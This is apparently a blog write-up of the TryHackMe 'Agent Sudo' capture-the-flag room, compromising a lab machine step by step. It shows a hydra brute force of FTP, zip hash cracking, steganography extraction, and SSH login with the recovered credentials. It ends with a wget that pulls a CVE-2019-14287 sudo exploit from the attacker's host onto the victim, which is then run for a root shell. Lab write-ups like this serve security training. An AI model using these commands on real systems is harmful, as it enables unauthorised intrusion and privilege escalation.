Agent Sudo (Tryhackme) Room Writeup By Jonty Bhardwaj
Hello Reader, I am Jonty Bhardwaj currently enrolled in Master Certificate in Cyber Security HackerU program. Today I am here to share a writeup on a Tryhackme machine called Agent Sudo.
Now first of all we will navigate to the Room URL and join it.
https://tryhackme.com/room/agentsudoctf
After starting the Machine we will first connect through Open VPN and ping the machine through the IP we are given to see if the connection is established. After we are successful in pinging the machine, we will start the fun part which is Pentesting and getting root privilege.
ping 10.10.172.217
Now first we will start a Nmap scan to see what are the ports and services open on the machine.
nmap -sV -sT -T4 10.10.172.217
Now we can see that 3 ports are open and the most promising port we can gather info looks to be port 80. Lets see what’s on the website there.
To see the data on the webpage with codename as told here , we need to use code names , one we already know is Agent R. Lets get the webpage using the value R.
curl -A “R” -L 10.10.172.217
As we can see here , there is a note saying that are you one of the 25 employees , it means there are more agents and from the naming scheme of Agent R , we can say that other agents may be using different Alphabets for naming like Agent A , Agent B , Agent C etc. . Lets find out which agent name is working by using trial and error on all alphabets .
Searching for some time we only find 1 agent name containing information. Agent C.
curl -A “C” -L 10.10.172.217
In this note from Agent R , the user name is chris and apparently his password is weak . So we can use a brute force tool like hydra to crack the password on both ssh and ftp.
The bruteforce was successful on FTP .
hydra -l chris -P rockyou.txt 10.10.172.217 ftp
Now we got the username and password to login into ftp with credentials .
Username : chris
Password : crystal
ftp 10.10.172.217
After login inside FTP we found 3 file — 1 text and 2 image file. We downloaded the files into our machine to check out what information is there .
cat To_agentJ.txt
From this text file we know that the image files contain a password hidden in them . So now we have to extract information from both these images which we have downloaded from victim machine.
We use binwalk on the image file cutie.png and got a folder containing some file .
binwalk cutie.png -e
After we extracted the folder from the image we saw whats inside it .
cd _cutie.png.extracted
The folder contained some files which has no serious information and 1 zip file.
We tried to extract the zip file but it was password protected.
We then used zip2john tool to crack the zip file password.
zip2john 8702.zip > Output.txt
We got the output hash file which we cracked with john.
john Output.txt
We got the password to be alien . With this password we extarcted the zip file.
7z e 8702.zip
We then opened the To_agentR.txt to see the changes as the file is now replaced with new file with same name.
cat To_agentR.txt
We found a encrypted message which we need to decrypt. For this we used Cyberchef magic .
https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')&input=UVhKbFlUVXg
Decrypting this we found some sort of message which looks to be a password of some kind . Lets keep this password in memory if we need this in future.
Now we will use steghide to extract the information from the other image cute-alien.jpg with passphrase Area51.
steghide extract -sf cute-alien.jpg
cat message.txt
And just like we were told that the image contain credentials , we found the credentials successfully.
Username : james
Password: hackerrules!
Now after we have collected all information , Lets use these credentials and try to login into ssh.
ssh james@10.10.172.217
As we can see we are successful in enter the system through ssh with these credentials .
Searching for the user flag , we found it inside the james user directory itself .
cat /home/james/user_flag.txt
Now lets see what permissions the user has .
sudo -l
Lets search google with the information we have acquired with the permissions and see if we find an exploit.
After searching on google we found an appropriate website with exploit code. We then downloaded the exploit into our machine .
https://www.exploit-db.com/exploits/47502
The vulnerability CVE was CVE-2019–14287.
We then imported the exploit from our kali machine into the Victim machine .
wget http://10.8.107.42/47502.py
We then gave the exploit executable permission and then ran it using python3.
chmod +x 47502.py
python3 47502.py
As soon as we ran the exploit , it asked for our username which we gave it as james . And soon after we got the root shell. Our exploit has worked and we have successfully completed out Privilege Escalation .
Now all we have to do is find the root flag . We searched for the flag and found it to be in the root directory.
cat /root/root.txt
Here we have successfully escalated to root shell after using the exploit command and found the root flag in the root folder.
Proof of Completion
Congratulations on completing the room and reading the blog . Hope my blog helped you in your journey and made you learn something new .
Happy Hacking !!
